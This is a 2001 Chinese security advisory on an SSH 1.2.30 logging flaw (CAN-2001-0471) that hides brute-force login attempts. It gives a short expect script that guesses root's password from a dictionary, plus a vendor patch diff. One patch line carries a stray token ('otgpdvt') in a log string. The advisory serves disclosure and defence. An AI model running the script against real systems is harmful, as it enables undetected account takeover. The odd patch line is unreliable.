发布日期：2001-02-14
更新日期：2001-02-14

受影响系统：

SSH Communications Security ssh 1.2.30

不受影响系统：

- OpenSSH
- SSH2

描述：

---

BUGTRAQ  ID: 2345
CVE(CAN) ID: CAN-2001-0471

SSH1 是安全shell通信协议的一种实现。

SSH1守护程序中存在一个问题，允许攻击者通过尝试暴力猜测用户口令来入侵系
统。对于第四次登录尝试之后的失败连接，SSH1代码中的记录程序不再记录。
因此，攻击者可以进行暴力攻击，而SSH1日志中并不会显示很多的攻击尝试。
如果允许root远程登录，攻击者可能远程获取root权限。

<*来源：Jose Nazario (jose@crimelabs.net)
        http://www.crimelabs.net/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/expect -f
#
# simple expect exploit to brute force root's password via ssh without
# detection.. see CLABS200101 for info on this exploit.
#
# this is beerware, just buy me a beer at defcon if you like this.
# build your own dictionary, use at your own risk, no warranty, etc.
#
# jose@crimelabs.net  january, 2001
#
set timeout 3
set target [lindex $argv 0]
set dictionary [lindex $argv 1]

if {[llength $argv] !=  2} {
   puts stderr "Usage: $argv0 root@target dictionary\n"
   exit }

set tryPass [open $dictionary r]

foreach passwd [split [read $tryPass] "\n"] {
  spawn ssh $target
  expect ":"
  send "$passwd\n"
  expect "#" { puts "password is $passwd\n" ; exit }
  set id [exp_pid]
  exec kill -INT $id
}



建议：

---

临时解决方法：

NSFOCUS建议您换用OPENSSH或者SSH2
Jose Nazario (jose@crimelabs.net) 也提供了他的补丁程序：
$ diff -Naur ssh-1.2.30/sshd.c.orig ssh-1.2.30/sshd.c
--- ssh-1.2.30/sshd.c.orig      Wed Jan 31 12:11:08 2001
+++ ssh-1.2.30/sshd.c   Wed Jan 31 12:57:36 2001
@@ -2408,7 +2408,7 @@
               remote_user_name = client_user;
               break;
             }
-          debug("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
+          log_msg("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
                 user, client_user, get_canonical_hostname());
           xfree(client_user);
           break;
@@ -2469,7 +2469,7 @@
               mpz_clear(&client_host_key_n);
               break;
             }
-          debug("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
+          log_msg("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
                 user, client_user, get_canonical_hostname());
           xfree(client_user);
           mpz_clear(&client_host_key_e);
@@ -2500,7 +2500,7 @@
                 break;
               }
             mpz_clear(&n);
-            debug("RSA authentication for %.100s failed.", user);
+            log_msg("RSA authentication for %.100s failed.", user);
           }
           break;

@@ -2633,7 +2633,7 @@
               authenticated = 1;
               break;
             } else {
-              debug("TIS authentication for %.100s failed",user);
+              log_msg("TIS authentication for %.100s failed,otgpdvt",user);
               memset(password, 0, strlen(password));
               xfree(password);
               break;
@@ -2672,7 +2672,7 @@
           if (password_attempts > 0)
             {
               /* Log failures if attempted more than once. */
-              debug("Password authentication failed for user %.100s from %.100s.",
+              log_msg("Password authentication failed for user %.100s from %.100s.",

                     user, get_canonical_hostname());
             }
           password_attempts++;
@@ -2693,7 +2693,7 @@
               authenticated = 1;
               break;
             }
-          debug("Password authentication for %.100s failed.", user);
+          log_msg("Password authentication for %.100s failed.", user);
           memset(password, 0, strlen(password));
           xfree(password);
           break;
           

厂商补丁：

此问题已经在SSH1的CVS中修复。



浏览次数：4672
严重程度：0（网友投票）